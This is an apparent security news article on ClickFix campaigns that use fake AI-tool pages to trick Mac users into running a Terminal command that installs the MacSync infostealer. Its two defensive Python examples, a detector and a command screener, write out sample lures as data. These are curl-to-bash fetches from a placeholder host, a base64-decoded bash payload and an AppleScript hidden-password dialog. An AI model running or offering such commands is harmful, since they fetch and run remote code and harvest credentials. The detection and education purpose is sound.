
Mar 17, 2026

That Free AI Tool for Mac Is Stealing Your Passwords—One Terminal Command Is All It Takes

Three ClickFix campaigns are tricking macOS users into running a single Terminal command that deploys the MacSync infostealer—harvesting credentials, keychains, and crypto wallets.

macOS Users Are Not as Safe as They Think

The belief that Macs don't get malware has never been accurate, but a new wave of attacks makes it especially dangerous. Since November 2025, researchers at Sophos and Jamf Threat Labs have tracked three coordinated campaigns targeting macOS users with a technique called ClickFix. The campaigns use fake AI tools as bait, exploit users' trust in their own machines, and need no software vulnerability at all. All an attacker needs is for you to open Terminal, paste a single command, and press Enter.

The payload is MacSync, an infostealer built specifically for macOS. Once installed, it harvests saved passwords, keychain databases, files, and cryptocurrency wallet seed phrases. The attacker ends up with the keys to virtually everything on your machine.

macOS Terminal window showing a malicious command being pasted as part of a ClickFix social engineering attack

How ClickFix Social Engineering Works

ClickFix is not a technical exploit. It is a social engineering technique that sidesteps the protections macOS builds around untrusted software by convincing the user to run the payload themselves. As Sophos researchers note, the method "relies entirely on user interaction—usually copying and executing commands."

The attack follows a simple script. You land on a fake website, often through a sponsored search result or a convincing advertisement, that displays a professional-looking page for an AI productivity tool. The page instructs you to verify your system or complete an installation step by opening Terminal and pasting a command it provides. The command looks plausible: it might resemble a package installation or a system configuration task that developers run routinely. You paste it, press Enter, and type your password when prompted. The malware is now running with your permissions.

macOS Gatekeeper and notarization are designed to stop unsigned or unnotarized software from launching: when you open a downloaded app or installer, the quarantine attribute on the file triggers a check of its signature and notarization ticket. ClickFix sidesteps all of that because nothing is opened through that path. The user types a command into their own shell, the shell fetches and runs the script directly, and no quarantined app bundle ever reaches Gatekeeper. There is no unsigned app to block, only a shell command that the operating system has no reason to distrust because its owner chose to run it.

Three Campaigns, Three Fake AI Lures

Researchers documented three distinct campaigns, each targeting a different audience with a different fake AI product:

  • November 2025 — OpenAI Atlas: Attackers purchased Google sponsored search ads for a fake browser called "OpenAI Atlas." Users searching for AI tools encountered the ad, visited the fake site, and were walked through a Terminal based installation process that deployed MacSync.
  • December 2025 — Mac Cleanup via Malvertising: This campaign targeted people searching for "how to clean up your Mac." Ads led to pages that displayed what appeared to be real ChatGPT conversations recommending a cleanup tool. The installation instructions, again delivered through Terminal, were the malicious payload.
  • February 2026 — MacSync v2, Global Reach: A new variant of the campaign expanded its targeting to users in Belgium, India, North America, and South America. This version introduced significant technical upgrades designed to evade modern security tools.

The use of OpenAI branding is deliberate. The name carries credibility, and users eager to try the latest AI tools are less likely to scrutinize an installation process that feels routine.

Under the Hood: AppleScript, In-Memory Execution, and Evasion

The February 2026 variant introduced capabilities that go well beyond a simple dropper. The shell script executed in Terminal prompts the user for their login password. The script is already running as the logged-in user, so the password is not what lets MacSync start; it lets the malware do everything that user can do interactively, and it is the key to the stolen Keychain: the login keychain file is encrypted with a key derived from the login password, so a copy of the database is far less useful to an attacker without it. MacSync then runs under those same user-level permissions, meaning it can access anything the logged-in user can access.

The new variant adds two techniques that make detection significantly harder:

  • Dynamic AppleScript payloads: Instead of hardcoding malicious logic into the initial script, the malware fetches AppleScript instructions from a remote server at runtime. The payload can therefore change between infections, which makes signature-based detection less reliable and means two compromised machines may not carry the same second stage.
  • In-memory execution: The malicious code runs in memory without writing a persistent executable to disk, so file scanners such as XProtect and tools that key on a suspicious file being written or launched from an unusual location get no obvious trigger. It is not invisible, though: the process executions themselves, their command-line arguments, and the network fetch that delivers the script are still observable to endpoint telemetry, which is where detection for this variant has to live.

Together, these techniques represent a meaningful step up in operational sophistication. The attackers are actively adapting to the defenses that security teams deploy on managed macOS fleets.
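To make the detection side of the attack chain concrete (the paste described under "How ClickFix Social Engineering Works" and the inline-AppleScript, in-memory stage described just above), here is an added Python example written for this page; it is not code from Sophos, Jamf, or the MacSync authors. It runs a few lineage-aware rules over constructed process-execution events of the shape an EDR or the Endpoint Security framework records: a terminal app, a shell, a curl-to-shell pipe, and osascript launched with an inline script. The event schema (pid, ppid, name, argv), the process IDs, the example.invalid URLs, and the dialog text are all assumptions made up for the sample.

```python
import re
from typing import Dict, List, Tuple

# Process names and patterns the rules key on. A terminal emulator is the
# expected root of a ClickFix chain; everything else is what the page describes.
TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"sh", "bash", "zsh"}
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")
HIDDEN_ANSWER = re.compile(r"with hidden answer", re.IGNORECASE)

# Constructed sample: one record per process execution (assumed EDR schema).
SAMPLE_EVENTS: List[dict] = [
    {"pid": 100, "ppid": 1,   "name": "Terminal", "argv": ["Terminal"]},
    {"pid": 101, "ppid": 100, "name": "zsh",      "argv": ["-zsh"]},
    # the pasted one-liner: fetch a remote script and feed it to a shell
    {"pid": 102, "ppid": 101, "name": "bash",
     "argv": ["bash", "-c", "curl -fsSL https://example.invalid/x | bash"]},
    {"pid": 103, "ppid": 102, "name": "curl", "argv": ["curl", "-fsSL", "https://example.invalid/x"]},
    {"pid": 104, "ppid": 102, "name": "bash", "argv": ["bash"]},
    # AppleScript passed inline with -e: nothing is written to disk for a scanner to inspect
    {"pid": 105, "ppid": 104, "name": "osascript",
     "argv": ["osascript", "-e",
              'display dialog "macOS needs your password to continue" default answer "" with hidden answer']},
    {"pid": 106, "ppid": 104, "name": "osascript",
     "argv": ["osascript", "-e", 'do shell script "curl -fsSL https://example.invalid/stage2 | bash"']},
    # benign developer activity from the same shell: a script run from a file on disk
    {"pid": 200, "ppid": 101, "name": "osascript", "argv": ["osascript", "/Users/dev/scripts/backup.applescript"]},
]


def _lineage(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Process names from pid up to the root we know about (child first)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return names


def detect_clickfix_chain(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (pid, reason) findings for processes that look like a ClickFix chain.

    Every rule requires a terminal emulator somewhere in the ancestry: the same
    osascript invocation from a LaunchAgent or an MDM agent is a different story.
    """
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[int, str]] = []
    for ev in events:
        if not any(n in TERMINALS for n in _lineage(ev["pid"], by_pid)):
            continue
        argv = ev["argv"]
        cmdline = " ".join(argv)
        if ev["name"] in SHELLS and PIPE_TO_SHELL.search(cmdline):
            findings.append((ev["pid"], "remote script piped straight into a shell"))
        if ev["name"] == "osascript":
            args = argv[1:]
            # inline (-e) or stdin-fed script: no file on disk, exactly the in-memory case
            if "-e" in args or not args:
                findings.append((ev["pid"], "inline AppleScript with no script file on disk"))
            if HIDDEN_ANSWER.search(cmdline):
                findings.append((ev["pid"], "AppleScript dialog collecting a hidden (password) answer"))
            if "do shell script" in cmdline and PIPE_TO_SHELL.search(cmdline):
                findings.append((ev["pid"], "AppleScript fetching a second stage into a shell"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

In-memory execution removes the artefact that file scanners key on, not the execution itself: the exec events, their argv, and the outbound connection from curl or osascript are still recorded, which is what these rules consume. The inline `-e` heuristic will also fire on legitimate automation run from a terminal (the benign pid 200 above passes only because it runs a script file), so tune it with an allowlist of known scripts or parent processes rather than alerting on it alone.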

What MacSync Actually Steals

MacSync is purpose built to extract high value credentials and financial assets from macOS. Once running, it targets:

  • Saved credentials: Usernames and passwords stored in browsers, including autofill data for banking, work, and personal accounts
  • Keychain databases: The macOS Keychain stores passwords, certificates, and secure notes for the entire system—MacSync exfiltrates the entire database
  • Files: Documents, configuration files, and anything else accessible to the user account
  • Cryptocurrency wallet seed phrases: Browser extension wallets and desktop clients keep wallet data on the machine; whoever obtains the seed phrase, or the key material it unlocks, has complete and irreversible control over the funds, with no password reset to fall back on

The Keychain exfiltration is particularly significant. A single macOS Keychain can contain decades of stored passwords across hundreds of services. An attacker who obtains your Keychain database has a near complete picture of your digital life, and depending on your password reuse habits, may be able to access accounts you have not touched in years.

How to Protect Yourself

ClickFix works because it engineers a moment of trust at exactly the right time. Defending against it requires building habits that interrupt that trust before you act:

  • Do not paste commands from websites into Terminal without reading them first. Some legitimate developer tools are installed exactly this way, which is precisely why the lure works. The warning signs are a page you reached through an ad, a consumer product that wants a one-liner instead of a signed download, a command that "verifies" your system, and anything you cannot read end to end: base64 blobs, curl piped into bash, osascript. If you cannot explain what every part of a command does, do not run it.
  • Be skeptical of sponsored search results for software. All three campaigns used paid ads or malvertising to reach victims. Download software only from verified official sources, not from links in search ads.
  • Do not enter your system password when a script you did not write asks for it. A dialog that pops up out of a Terminal command is usually an AppleScript dialog the script itself created, not the system asking you, and it captures whatever you type. A genuine sudo prompt appears as text inside the Terminal window, not as a separate window. If you did not deliberately start a trusted installation, stop.
  • Use a password manager that does not rely solely on the system Keychain. If your Keychain is compromised, a standalone password manager with its own master password provides an additional layer of separation, as long as the vault is locked when you are not using it: a stealer running as you can read anything that is unlocked.
  • Keep macOS updated and leave its built-in protections on. ClickFix bypasses Gatekeeper by design, but keeping Gatekeeper enabled and the OS current means XProtect signatures and the other platform defenses are up to date for the stages of an attack that do touch disk or reuse a known technique.
  • If you think you may have been compromised, revoke and rotate credentials immediately from a different device. Prioritize banking, email, and any accounts linked to cryptocurrency, and move crypto to a fresh wallet whose seed phrase never existed on the affected Mac. Assume your Keychain contents are in attacker hands, and because the second stage is fetched at runtime and can differ per victim, treat the machine as untrusted until it has been wiped and reinstalled.
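The first and third habits above amount to screening a command before you run it. The following is an added Python example, written for this page rather than taken from Sophos, Jamf, or any product, that applies a handful of red-flag rules to a pasted command and returns the reasons it should be read before it is run. The rules are heuristics chosen for this illustration, not a published ClickFix signature; the sample commands are constructed (the "lure" is built at runtime from a placeholder example.invalid URL), except for the Homebrew installer line, which is included precisely because a legitimate installer trips the same check.

```python
import base64
import re
from typing import List

# Heuristics written for this example: (reason, regex). A hit means
# "fetch it to a file and read it first", not "certainly malicious".
RULES = [
    ("downloads a remote script straight into a shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")),
    ("executes downloaded text via command substitution",
     re.compile(r"\$\(\s*(curl|wget)\b|`\s*(curl|wget)\b")),
    ("decodes an encoded blob before running it",
     re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b")),
    ("evaluates a string as code",
     re.compile(r"\beval\b")),
    ("runs AppleScript from the shell",
     re.compile(r"\bosascript\b")),
    ("prompts for a password through an AppleScript dialog",
     re.compile(r"with hidden answer", re.IGNORECASE)),
    ("strips the quarantine attribute Gatekeeper relies on",
     re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|\s-c\b)")),
    ("feeds a password to sudo on the command line",
     re.compile(r"\|\s*sudo\s+-S\b")),
    ("silences all output",
     re.compile(r"(&>\s*/dev/null|>\s*/dev/null\s+2>&1)")),
]


def _opaque_tokens(cmd: str) -> List[str]:
    """Whitespace-separated tokens that look like a base64 blob rather than a URL or path."""
    out = []
    for tok in cmd.split():
        tok = tok.strip("'\"")
        if (len(tok) >= 40 and "://" not in tok and not tok.startswith(("/", "-"))
                and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", tok)):
            out.append(tok)
    return out


def screen_command(cmd: str) -> List[str]:
    """Return the list of reasons a pasted command deserves a read-through before running."""
    reasons = [reason for reason, rx in RULES if rx.search(cmd)]
    if _opaque_tokens(cmd):
        reasons.append("contains a long opaque encoded token")
    return reasons


# Constructed samples. The lure's blob is real base64 of a harmless placeholder
# line so the decode rule and the opaque-token rule both have something to find.
_LURE_BLOB = base64.b64encode(b"curl -fsSL https://example.invalid/x | bash").decode()
SAMPLES = {
    "benign": "brew install wget",
    # the real Homebrew installer line: legitimate, and it trips the same heuristic
    "homebrew": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "lure": f'echo "{_LURE_BLOB}" | base64 -D | bash',
    "dialog": "osascript -e 'display dialog \"Your Mac needs your password to continue\" default answer \"\" with hidden answer'",
}


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        reasons = screen_command(cmd)
        print(f"{label}: {'OK' if not reasons else 'READ FIRST'}")
        for r in reasons:
            print(f"  - {r}")
```

The Homebrew line is the point: a legitimate installer and a lure both fetch a script into a shell, so "never paste commands" cannot be the whole rule. When anything is flagged, save the script with `curl -o`, read it, and only then run it from the file. A site you reached through an ad that insists on a one-liner instead of a signed download gets no such second chance.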

The researchers who discovered and documented these campaigns—Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey at Sophos, alongside the team at Jamf Threat Labs—have made detection indicators available to enterprise security teams. If you manage a macOS fleet, their published indicators of compromise are worth reviewing and deploying immediately.